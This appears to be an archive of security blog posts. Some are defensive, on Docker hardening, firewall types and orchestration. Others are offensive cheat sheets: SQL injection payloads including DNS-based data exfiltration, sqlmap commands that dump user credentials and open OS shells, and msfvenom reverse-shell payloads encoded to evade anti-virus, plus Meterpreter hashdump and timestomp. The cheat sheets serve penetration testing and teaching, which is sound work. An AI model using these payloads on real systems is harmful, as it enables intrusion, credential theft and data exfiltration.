Posted in Software Engineering

10 Docker security best practices

1. Prefer minimal base images

A common Docker container security issue is ending up with big images for your containers. Oftentimes, you might start a project with a generic base image, such as a Dockerfile that begins with FROM node, as your “default”. However, when specifying the node image, you should take into consideration that the fully installed Debian Stretch distribution is the underlying image used to build it. If your project doesn’t require any general system libraries or system utilities, it is better to avoid using a full-blown operating system (OS) as a base image.

Top ten most popular Docker images each contain at least 30 vulnerabilities

As can be seen in the open source security report 2020, each of the top ten Docker images inspected on Docker Hub contained known vulnerabilities, with the exception of Ubuntu. By preferring minimal images that bundle only the necessary system tools and libraries required to run your project, you also minimize the attack surface and help ensure that you ship a secure OS.
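To see the difference in practice, pull the default image alongside a minimal variant and compare their sizes; a quick sketch, assuming a local Docker installation:

# the full Debian-based image vs. the Alpine-based variant
docker pull node:10
docker pull node:10-alpine

# compare the footprint of the two tags
docker images node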

2. Least privileged user

When a Dockerfile doesn’t specify a USER, the container defaults to running as the root user. In practice, there are very few reasons why a container should have root privileges, and this can easily manifest as a Docker security issue. Because the container’s root user maps, by default, to the root user on the Docker host, a container running as root potentially has root access on the host. Having the application in the container run as root further broadens the attack surface and enables an easy path to privilege escalation if the application itself is vulnerable to exploitation.

To minimize exposure, create a dedicated user and a dedicated group in the Docker image for the application, and use the USER directive in the Dockerfile to ensure the container runs the application with the least privileged access possible.

The specific user might not exist in the image; in that case, create the user with instructions in the Dockerfile.
The following demonstrates a complete example of how to do this for a generic Ubuntu image:

FROM ubuntu
RUN mkdir /app
RUN groupadd -r lirantal && useradd -r -s /bin/false -g lirantal lirantal
WORKDIR /app
COPY . /app
RUN chown -R lirantal:lirantal /app
USER lirantal
CMD node index.js

The example above:

  • creates a system user (-r) with no password, no home directory, and no shell
  • adds that user to the group created beforehand (using groupadd)
  • passes the user name as the final argument, associating the new user with the group
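A quick way to confirm the USER directive took effect, assuming the image above is built and tagged myapp (a hypothetical tag):

docker build -t myapp .
docker run --rm myapp whoami   # prints: lirantal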

If you’re a fan of Node.js and alpine images, they already bundle a generic user for you called node. Here’s a Node.js example, making use of the generic node user:

FROM node:10-alpine 
RUN mkdir /app
COPY . /app
RUN chown -R node:node /app
USER node
CMD ["node", "index.js"]

If you’re developing Node.js applications, you may want to consult the official Docker and Node.js Best Practices.


3. Sign and verify images to mitigate MITM attacks

Authenticity of Docker images is a challenge. We put a lot of trust into these images, as we are literally using them as the container that runs our code in production. Therefore, it is critical to make sure the image we pull is the one pushed by the publisher, and that no party has modified it. Tampering may occur over the wire, between the Docker client and the registry, or by compromising the registry or the owner’s account in order to push a malicious image.

Verify docker images

Docker defaults allow pulling Docker images without validating their authenticity, thus potentially exposing you to arbitrary Docker images whose origin and author aren’t verified.

Make it a best practice that you always verify images before pulling them in, regardless of policy. To experiment with verification, temporarily enable Docker Content Trust with the following command:

export DOCKER_CONTENT_TRUST=1

Now attempt to pull an image that you know is not signed—the request is denied and the image is not pulled.

Sign docker images

Prefer Docker Certified images that come from trusted partners who have been vetted and curated by Docker Hub rather than images whose origin and authenticity you can’t validate.

Docker allows signing images and, by doing so, provides another layer of protection. To sign images, use Docker Notary. Notary verifies the image signature for you, and blocks you from running an image if its signature is invalid.

When Docker Content Trust is enabled, as we exhibited above, a Docker image build signs the image. When the image is signed for the first time, Docker generates and saves a private key in ~/.docker/trust for your user. This private key is then used to sign any additional images as they are built.

For detailed instructions on setting up signed images, refer to Docker’s official documentation.
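If you want to experiment with signing yourself, recent Docker versions wrap Notary with the docker trust commands. A minimal sketch, assuming a hypothetical repository registry.example.com/acme/app that you can push to:

# generate a key pair for a delegated signer named "alice"
docker trust key generate alice

# register alice as a signer for the repository
docker trust signer add --key alice.pub alice registry.example.com/acme/app

# sign and push a tag, then review the trust data
docker trust sign registry.example.com/acme/app:1.0.0
docker trust inspect --pretty registry.example.com/acme/app:1.0.0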

How is signing Docker images with Docker’s Content Trust and Notary different from using GPG? Diogo Mónica has a great talk on this, but essentially GPG helps you with verification of the signature, not with protection against replay attacks.

4. Find, fix and monitor for open source vulnerabilities

When we choose a base image for our Docker container, we indirectly take upon ourselves the risk of all the container security concerns that the base image is bundled with. These can be poorly configured defaults that don’t contribute to the security of the operating system, as well as system libraries that are bundled with the base image we chose.

A good first step is to make use of as minimal a base image as is possible while still being able to run your application without issues. This helps reduce the attack surface by limiting exposure to vulnerabilities; on the other hand, it doesn’t run any audits on its own, nor does it protect you from future vulnerabilities that may be disclosed for the version of the base image that you are using.

Therefore, one way of protecting against vulnerabilities in open source software is to use tools such as Snyk to add continuous Docker security scanning and monitoring of vulnerabilities that may exist across all of the Docker image layers in use.

Snyk Docker Scanning and Remediation from the CLI

Scan a Docker image for known vulnerabilities with these commands:

# fetch the image to be tested so it exists locally
$ docker pull node:10
# scan the image with snyk
$ snyk test --docker node:10 --file=path/to/Dockerfile

Monitor a Docker image for known vulnerabilities so that once newly discovered vulnerabilities are found in the image, Snyk can notify and provide remediation advice:

$ snyk monitor --docker node:10

5. Don’t leak sensitive information to Docker images

Sometimes, when building an application inside a Docker image, you need secrets such as an SSH private key to pull code from a private repository, or tokens to install private packages. If you copy them into the intermediate Docker container, they are cached in the layer they were added to, even if you delete them later on. These tokens and keys must be kept outside of the Dockerfile.

Using multi-stage builds

Another aspect of improving Docker container security is the use of multi-stage builds. By leveraging Docker support for multi-stage builds, fetch and manage secrets in an intermediate image layer that is later disposed of, so that no sensitive data reaches the final image. Use code like the following to add secrets to that intermediate layer:

FROM ubuntu as intermediate

WORKDIR /app
COPY secret/key /tmp/
# use the key to fetch private files; the key never leaves this stage
RUN scp -i /tmp/key build@acme:files .

FROM ubuntu
WORKDIR /app
# only the fetched files are copied; the intermediate stage is discarded
COPY --from=intermediate /app .

Using Docker secret commands

Alternatively, use Docker’s (still experimental) build secrets feature to mount sensitive files without caching them, similar to the following:

# syntax = docker/dockerfile:1.0-experimental
FROM alpine

# shows secret from default secret location
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret

# shows secret from custom secret location
RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar
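The secret itself is supplied at build time. A sketch, assuming it lives in a local file named mysecret.txt and BuildKit is available:

DOCKER_BUILDKIT=1 docker build --secret id=mysecret,src=mysecret.txt .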

Read more about Docker secrets on their site.

Beware of recursive copy

You should also be mindful when copying files into the image that is being built. For example, the following command copies the entire build context folder, recursively, to the Docker image, which could end up copying sensitive files as well:

COPY . .

If you have sensitive files in your folder, either remove them or use .dockerignore to ignore them:

private.key
appsettings.json

6. Use fixed tags for immutability

Each Docker image can have multiple tags, which are variants of the same image. The most common tag is latest, which represents the latest version of the image. Image tags are not immutable, and the author of an image can publish the same tag multiple times.

This means that the base image for your Docker file might change between builds. This could result in inconsistent behavior because of changes made to the base image. There are multiple ways to mitigate this issue and improve your Docker security posture:

  • Prefer the most specific tag available. If the image has multiple tags, such as :8 and :8.0.1 or even :8.0.1-alpine, prefer the latter, as it is the most specific image reference. Avoid using the most generic tags, such as latest. Keep in mind that when pinning a specific tag, it might be deleted eventually.
  • To mitigate the issue of a specific image tag becoming unavailable and becoming a show-stopper for teams that rely on it, consider running a local mirror of this image in a registry or account that is under your own control. It’s important to take into account the maintenance overhead required for this approach—because it means you need to maintain a registry. Replicating the image you want to use in a registry that you own is good practice to make sure that the image you use does not change.
  • Be very specific! Instead of pulling a tag, pull an image using its exact SHA256 digest, which guarantees you get the same image for every pull (see the sketch after this list). Note, however, that a digest reference carries its own risk: if the image is rebuilt, the old hash may no longer exist.
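A minimal sketch of digest pinning; the digest shown is a placeholder, not a real value:

# look up the digest of the image you currently trust
docker images --digests node

# pull by the immutable digest instead of a mutable tag
docker pull node@sha256:<digest-from-above>   # placeholder digest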

7. Use COPY instead of ADD

Docker provides two commands for copying files from the host to the Docker image when building it: COPY and ADD. The instructions are similar in nature, but differ in their functionality and can result in Docker container security issues for the image:

  • COPY — copies local files recursively, given explicit source and destination files or directories. With COPY, you must declare the locations.
  • ADD — copies local files recursively, implicitly creates the destination directory when it doesn’t exist, and accepts archives as local or remote URLs as its source, which it expands or downloads respectively into the destination directory.

While subtle, the differences between ADD and COPY are important. Be aware of these differences to avoid potential security issues:

  • When remote URLs are used to download data directly into a destination, they could result in man-in-the-middle attacks that modify the content of the file being downloaded, and the origin and authenticity of remote URLs need further validation. If remote files are needed, fetch them in a RUN command over a secure TLS connection and validate what was downloaded, rather than relying on ADD (see the sketch after this list).
  • Space and image layer considerations: using COPY allows separating the addition of an archive from remote locations and unpacking it as different layers, which optimizes the image cache. If remote files are needed, combining the download, extraction, and clean-up in a single RUN command produces one layer instead of the several layers that ADD would require.
  • When local archives are used, ADD automatically extracts them to the destination directory. While this may be acceptable, it adds the risk of zip bombs and Zip Slip vulnerabilities that could then be triggered automatically.
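A sketch of the RUN-based alternative to ADD for remote files; the URL and checksum are hypothetical placeholders:

FROM alpine
# fetch over TLS, verify a known checksum, unpack, and clean up in a single layer
RUN wget -q https://example.com/archive.tar.gz \
 && echo "<expected-sha256>  archive.tar.gz" | sha256sum -c - \
 && tar -xzf archive.tar.gz \
 && rm archive.tar.gz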

8. Use metadata labels

Image labels provide metadata for the image you’re building. This helps users understand how to use the image easily. The most common label is “maintainer”, which specifies the email address and the name of the person maintaining the image. Add metadata with the following LABEL command:

LABEL maintainer="me@acme.com"

In addition to a maintainer contact, add any metadata that is important to you. This metadata could contain: a commit hash, a link to the relevant build, quality status (did all tests pass?), source code, a reference to your SECURITY.TXT file location and so on.

When adding labels, it is good practice to include one pointing to a SECURITY.TXT (RFC5785) file that declares your responsible disclosure policy, such as the following:

LABEL securitytxt="https://www.example.com/.well-known/security.txt"
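Labels can be read back from a built image, for example with docker inspect (assuming a hypothetical image tagged acme/app):

docker inspect -f '{{json .Config.Labels}}' acme/app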

See more information about labels for Docker images: https://label-schema.org/rc1/

9. Use multi-stage build for small and secure images

While building your application with a Dockerfile, many artifacts are created that are required only at build time. These can be packages such as development tooling and libraries required for compiling, dependencies required for running unit tests, temporary files, secrets, and so on.

Keeping these artifacts in the base image, which may be used for production, results in an increased Docker image size, and this can badly affect the time spent downloading it, as well as increase the attack surface because more packages are installed as a result. The same is true for the Docker image you’re using: you might need a specific Docker image for building, but not for running the code of your application.

Golang is a great example. To build a Golang application, you need the Go compiler, but the compiler produces a statically linked executable that runs without any further dependencies, even in a scratch image.

This is a good reason why Docker has the multi-stage build capability. This feature allows you to use multiple temporary images in the build process, keeping only the final image along with the information you copied into it (see the sketch after this list). In this way, you end up with two images:

  • First image—a very big image size, bundled with many dependencies that are used in order to build your app and run tests.
  • Second image—a very thin image in terms of size and number of libraries, with only a copy of the artifacts required to run the app in production.
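A minimal sketch of such a two-stage build for a hypothetical Go application with main.go at the project root:

# build stage: full Go toolchain, discarded after the build
FROM golang:1.13 as builder
WORKDIR /src
COPY . .
# CGO disabled so the binary is fully static and runs in scratch
RUN CGO_ENABLED=0 go build -o /app .

# final stage: empty base image with only the compiled binary
FROM scratch
COPY --from=builder /app /app
ENTRYPOINT ["/app"]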

10. Use a linter

Adopt a linter to avoid common mistakes and establish best practice guidelines that engineers can follow in an automated way. This is a helpful form of Docker security scanning: statically analyzing the Dockerfile for security issues.

One such linter is hadolint. It parses a Dockerfile and warns about anything that does not match its best practice rules.


Hadolint is even more powerful when it is used inside an integrated development environment (IDE). For example, when using hadolint as a VSCode extension, linting errors appear while typing. This helps in writing better Dockerfiles faster.
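Running hadolint is a one-liner; for example, via its published container image, so nothing needs to be installed locally:

docker run --rm -i hadolint/hadolint < Dockerfile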

Be sure to print out the cheat sheet and pin it up somewhere to remind you of some of the docker image security best practices you should follow when building and working with docker images!

How do you harden a docker container image?

You may use linters such as hadolint or dockle to ensure the Dockerfile has a secure configuration. Make sure you also scan your container images, to avoid vulnerabilities with a severe security impact reaching your production containers.

Posted in Security

SQL Injection cheat sheet

This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL injection attacks.

String concatenation

You can concatenate together multiple strings to make a single string.

Oracle: 'foo'||'bar'
Microsoft: 'foo'+'bar'
PostgreSQL: 'foo'||'bar'
MySQL: 'foo' 'bar' [Note the space between the two strings]
MySQL: CONCAT('foo','bar')

Substring

You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string ba.

Oracle: SUBSTR('foobar', 4, 2)
Microsoft: SUBSTRING('foobar', 4, 2)
PostgreSQL: SUBSTRING('foobar', 4, 2)
MySQL: SUBSTRING('foobar', 4, 2)

Comments

You can use comments to truncate a query and remove the portion of the original query that follows your input.

Oracle: --comment
Microsoft: --comment
Microsoft: /*comment*/
PostgreSQL: --comment
PostgreSQL: /*comment*/
MySQL: #comment
MySQL: -- comment [Note the space after the double dash]
MySQL: /*comment*/

Database version

You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.

Oracle: SELECT banner FROM v$version
Oracle: SELECT version FROM v$instance
Microsoft: SELECT @@version
PostgreSQL: SELECT version()
MySQL: SELECT @@version

Database contents

You can list the tables that exist in the database, and the columns that those tables contain.

Oracle: SELECT * FROM all_tables
Oracle: SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft: SELECT * FROM information_schema.tables
Microsoft: SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL: SELECT * FROM information_schema.tables
PostgreSQL: SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL: SELECT * FROM information_schema.tables
MySQL: SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors

You can test a single boolean condition and trigger a database error if the condition is true.

Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL: SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries

You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.

Oracle: Does not support batched queries.
Microsoft: QUERY-1-HERE; QUERY-2-HERE
PostgreSQL: QUERY-1-HERE; QUERY-2-HERE
MySQL: Does not support batched queries.

Time delays

You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.

Oracle: dbms_pipe.receive_message(('a'),10)
Microsoft: WAITFOR DELAY '0:0:10'
PostgreSQL: SELECT pg_sleep(10)
MySQL: SELECT sleep(10)

Conditional time delays

You can test a single boolean condition and trigger a time delay if the condition is true.

Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft: IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL: SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup

You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.

Oracle: The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched, but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

Oracle: The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')

Microsoft: exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'

PostgreSQL: copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'

MySQL: The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration

You can cause the database to perform a DNS lookup to an external domain containing the results of an injected query. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including the exfiltrated data.

Oracle: SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

Microsoft: declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')

PostgreSQL:
create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();

MySQL: The following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

Posted in Security

8 Types of Firewalls


Firewall types can be divided into several different categories based on their general structure and method of operation. Here are eight types of firewalls:

  • Packet-filtering firewalls
  • Circuit-level gateways
  • Stateful inspection firewalls
  • Application-level gateways (a.k.a. proxy firewalls)
  • Next-gen firewalls
  • Software firewalls
  • Hardware firewalls
  • Cloud firewalls

Note: The last three bullets list methods of delivering firewall functionality, rather than being types of firewall architectures in and of themselves.

How do these firewalls work? And, which ones are the best for your business’ cybersecurity needs?

Here are a few brief explainers:

Packet-Filtering Firewalls


As the oldest and most “basic” type of firewall architecture, packet-filtering firewalls create a checkpoint at a traffic router or switch. The firewall performs a simple check of the data packets coming through the router, inspecting information such as the destination and origination IP address, packet type, port number, and other surface-level details without opening up the packet to inspect its contents.

If the information packet doesn’t pass the inspection, it is dropped.

The good thing about these firewalls is that they aren’t very resource-intensive. This means they don’t have a huge impact on system performance and are relatively simple. However, they’re also relatively easy to bypass compared to firewalls with more robust inspection capabilities.

Circuit-Level Gateways

Circuit-level gateways are another simplistic firewall type, meant to quickly and easily approve or deny traffic without consuming significant computing resources. They work by verifying the transmission control protocol (TCP) handshake. This TCP handshake check is designed to make sure that the session the packet is from is legitimate.

While extremely resource-efficient, these firewalls do not check the packet itself. So, if a packet held malware, but had the right TCP handshake, it would pass right through. This is why circuit-level gateways are not enough to protect your business by themselves.

Stateful Inspection Firewalls

These firewalls combine both packet inspection technology and TCP handshake verification to create a level of protection greater than either of the previous two architectures could provide alone.

However, these firewalls do put more of a strain on computing resources as well. This may slow down the transfer of legitimate packets compared to the other solutions.

Proxy Firewalls (Application-Level Gateways/Cloud Firewalls)

Proxy firewalls operate at the application layer to filter incoming traffic between your network and the traffic source—hence, the name “application-level gateway.” These firewalls are delivered via a cloud-based solution or another proxy device. Rather than letting traffic connect directly, the proxy firewall first establishes a connection to the source of the traffic and inspects the incoming data packet.

This check is similar to the stateful inspection firewall in that it looks at both the packet and at the TCP handshake protocol. However, proxy firewalls may also perform deep-layer packet inspections, checking the actual contents of the information packet to verify that it contains no malware.

Once the check is complete, and the packet is approved to connect to the destination, the proxy sends it off. This creates an extra layer of separation between the “client” (the system where the packet originated) and the individual devices on your network—obscuring them to create additional anonymity and protection for your network.

If there’s one drawback to proxy firewalls, it’s that they can create significant slowdown because of the extra steps in the data packet transfer process.

Next-Generation Firewalls

Many of the most recently released firewall products are touted as “next-generation” architectures. However, there is little consensus on what makes a firewall truly next-gen.

Some common features of next-generation firewall architectures include deep-packet inspection (checking the actual contents of the data packet), TCP handshake checks, and surface-level packet inspection. Next-generation firewalls may include other technologies as well, such as intrusion prevention systems (IPSs) that work to automatically stop attacks against your network.

The issue is that there is no one definition of a next-generation firewall, so it’s important to verify what specific capabilities such firewalls have before investing in one.

Software Firewalls

Software firewalls include any type of firewall that is installed on a local device rather than a separate piece of hardware (or a cloud server). The big benefit of a software firewall is that it’s highly useful for creating defense in depth by isolating individual network endpoints from one another.

However, maintaining individual software firewalls on different devices can be difficult and time-consuming. Furthermore, not every device on a network may be compatible with a single software firewall, which may mean having to use several different software firewalls to cover every asset.

Hardware Firewalls

Hardware firewalls use a physical appliance that acts in a manner similar to a traffic router to intercept data packets and traffic requests before they’re connected to the network’s servers. Physical appliance-based firewalls like this excel at perimeter security by making sure malicious traffic from outside the network is intercepted before the company’s network endpoints are exposed to risk.

The major weakness of a hardware-based firewall, however, is that insider attacks can often bypass it. Also, the actual capabilities of a hardware firewall may vary depending on the manufacturer; some may have a more limited capacity to handle simultaneous connections than others, for example.

Cloud Firewalls


Whenever a cloud solution is used to deliver a firewall, it can be called a cloud firewall, or firewall-as-a-service (FaaS). Cloud firewalls are considered synonymous with proxy firewalls by many, since a cloud server is often used in a proxy firewall setup (though the proxy doesn’t necessarily have to be on the cloud, it frequently is).

The big benefit of having cloud-based firewalls is that they are very easy to scale with your organization. As your needs grow, you can add additional capacity to the cloud server to filter larger traffic loads. Cloud firewalls, like hardware firewalls, excel at perimeter security.

Posted in Software Engineering

Why Use a Container Orchestrator?

Although we can manually maintain a couple of containers or write scripts for dozens of them, orchestrators make things much easier for operators, especially when it comes to managing hundreds or thousands of containers running on a global infrastructure. Most container orchestrators can:

  • Group hosts together while creating a cluster
  • Schedule containers to run on hosts in the cluster based on resources availability
  • Enable containers in a cluster to communicate with each other regardless of the host they are deployed to in the cluster
  • Bind containers and storage resources
  • Group sets of similar containers and bind them to load-balancing constructs to simplify access to containerized applications by creating a level of abstraction between the containers and the user
  • Manage and optimize resource usage
  • Allow for implementation of policies to secure access to applications running inside containers.

With all these configurable yet flexible features, container orchestrators are an obvious choice when it comes to managing containerized applications at scale. In this course, we will explore Kubernetes, one of the most in-demand container orchestration tools available today.

 

Most container orchestrators can be deployed on the infrastructure of our choice – on bare metal, Virtual Machines, on-premise, or the public cloud. Kubernetes, for example, can be deployed on a workstation, with or without a local hypervisor such as Oracle VirtualBox, inside a company’s data center, in the cloud on AWS Elastic Compute Cloud (EC2) instances, Google Compute Engine (GCE) VMs, DigitalOcean Droplets, OpenStack, etc.

There are turnkey solutions which allow Kubernetes clusters to be installed, with only a few commands, on top of cloud Infrastructures-as-a-Service, such as GCE, AWS EC2, Docker Enterprise, IBM Cloud, Rancher, VMware, Pivotal, and multi-cloud solutions through IBM Cloud Private and StackPointCloud.

Last but not least, there is managed container orchestration as-a-Service, more specifically managed Kubernetes as-a-Service, offered and hosted by the major cloud providers, such as Google Kubernetes Engine (GKE), Amazon Elastic Container Service for Kubernetes (Amazon EKS), Azure Kubernetes Service (AKS), IBM Cloud Kubernetes Service, DigitalOcean Kubernetes, Oracle Container Engine for Kubernetes, etc.

Posted in Security

SQL Map Cheat Sheet

Easy Scanning option

sqlmap -u "http://testsite.com/login.php"

Scanning by using tor

sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5

Scanning by manually setting the return time

sqlmap -u "http://testsite.com/login.php" --time-sec 15

List all databases at the site

sqlmap -u "http://testsite.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://testsite.com/login.php" -D site_db --tables

Dump the contents of a DB table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump

List all columns in a table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns

Dump only selected columns

sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump

Get OS Shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell
Posted in Security

Mobile Device Security

Android

Root

  • Root (connected to PC): Dr.Fone – Root, Kingo, SRSRoot, Root Genius, iRoot
  • Root (app): SuperSU Pro Root App, Superuser Root App, Superuser X [L] Root App

Other:

  • zANTI is an easy-to-use penetration testing and security analysis toolkit.
  • Tealium Charles Proxy, a proxy server for Android

iOS

  • Jailbreak (online): Hexxa Plus
  • Jailbreak (connected to PC): Unc0ver, Pangu Jailbreak, Checkra1n, Virtual Jailbreak, Hardware Jailbreak

Other:

class-dump is a command-line utility for examining the Objective-C runtime information stored in Mach-O files. It generates declarations for the classes, categories and protocols. This is the same information provided by using 'otool -ov', but presented as normal Objective-C declarations, so it is much more compact and readable.

ipash ME (Micro Edition) – the missing command line shell for iPhone! Manage your iPhone and files from the command line.

Keychain is the password management system in macOS, developed by Apple. 

IDA Pro is an interactive disassembler and debugger: a piece of software used to translate machine code into a human-readable format called assembly language. It is available for Windows, Linux, and macOS.

Posted in Security

Metasploit cheat sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.

Metasploit is a popular tool used by pentest experts. I have prepared a document for you to learn from.

Metasploit :

Search for module:
msf > search [regex]

Specify an exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options:
msf > set [Option] [Value]

Start exploit:
msf > exploit 

Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run 

msfvenom :

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.

$ msfvenom -p [PayloadPath]
-f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example :

Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Format options (specified with -f): run msfvenom with --help-formats to list available output formats.

exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeIterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example

Encode a payload 5 times using the shikata_ga_nai encoder and output as an executable:

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter
Base Commands:

? / help: Display a summary of commands

exit / quit: Exit the Meterpreter session

sysinfo: Show the system name and OS type

shutdown / reboot: Self-explanatory

File System Commands:

cd: Change directory

lcd: Change directory on local (attacker’s) machine

pwd / getwd: Display current working directory

ls: Show the contents of the directory

cat: Display the contents of a file on screen

download / upload: Move files to/from the target machine

mkdir / rmdir: Make / remove directory

edit: Open a file in the default editor (typically vi)

Process Commands:

getpid: Display the process ID that Meterpreter is running inside.

getuid: Display the user ID that Meterpreter is running with.

ps: Display process list.

kill: Terminate a process given its process ID.

execute: Run a given program with the privileges of the process the Meterpreter is loaded in.

migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.
Network Commands:

ipconfig: Show network interface information

portfwd: Forward packets through TCP session

route: Manage/view the system’s routing table

Misc Commands:

idletime: Display the duration that the GUI of the target machine has been idle.

uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.

screenshot: Save as an image a screenshot of the target machine.

Additional Modules:

use [module]: Load the specified module

Example:

use priv: Load the priv module

hashdump: Dump the hashes from the box

timestomp: Alter NTFS file timestamps

Managing Sessions
Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit -j

List all current jobs (usually exploit listeners):
msf > jobs -l

Kill a job:
msf > jobs -k [JobID]

Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > sessions -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:

All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
Posted in Security

NMAP cheat sheet

Target Specification

Switch | Example | Description
 | nmap 192.168.1.1 | Scan a single IP
 | nmap 192.168.1.1 192.168.2.1 | Scan specific IPs
 | nmap 192.168.1.1-254 | Scan a range
 | nmap scanme.nmap.org | Scan a domain
 | nmap 192.168.1.0/24 | Scan using CIDR notation
-iL | nmap -iL targets.txt | Scan targets from a file
-iR | nmap -iR 100 | Scan 100 random hosts
--exclude | nmap --exclude 192.168.1.1 | Exclude listed hosts

Scan Techniques

Switch | Example | Description
-sS | nmap 192.168.1.1 -sS | TCP SYN port scan (default)
-sT | nmap 192.168.1.1 -sT | TCP connect port scan (default without root privilege)
-sU | nmap 192.168.1.1 -sU | UDP port scan
-sA | nmap 192.168.1.1 -sA | TCP ACK port scan
-sW | nmap 192.168.1.1 -sW | TCP Window port scan
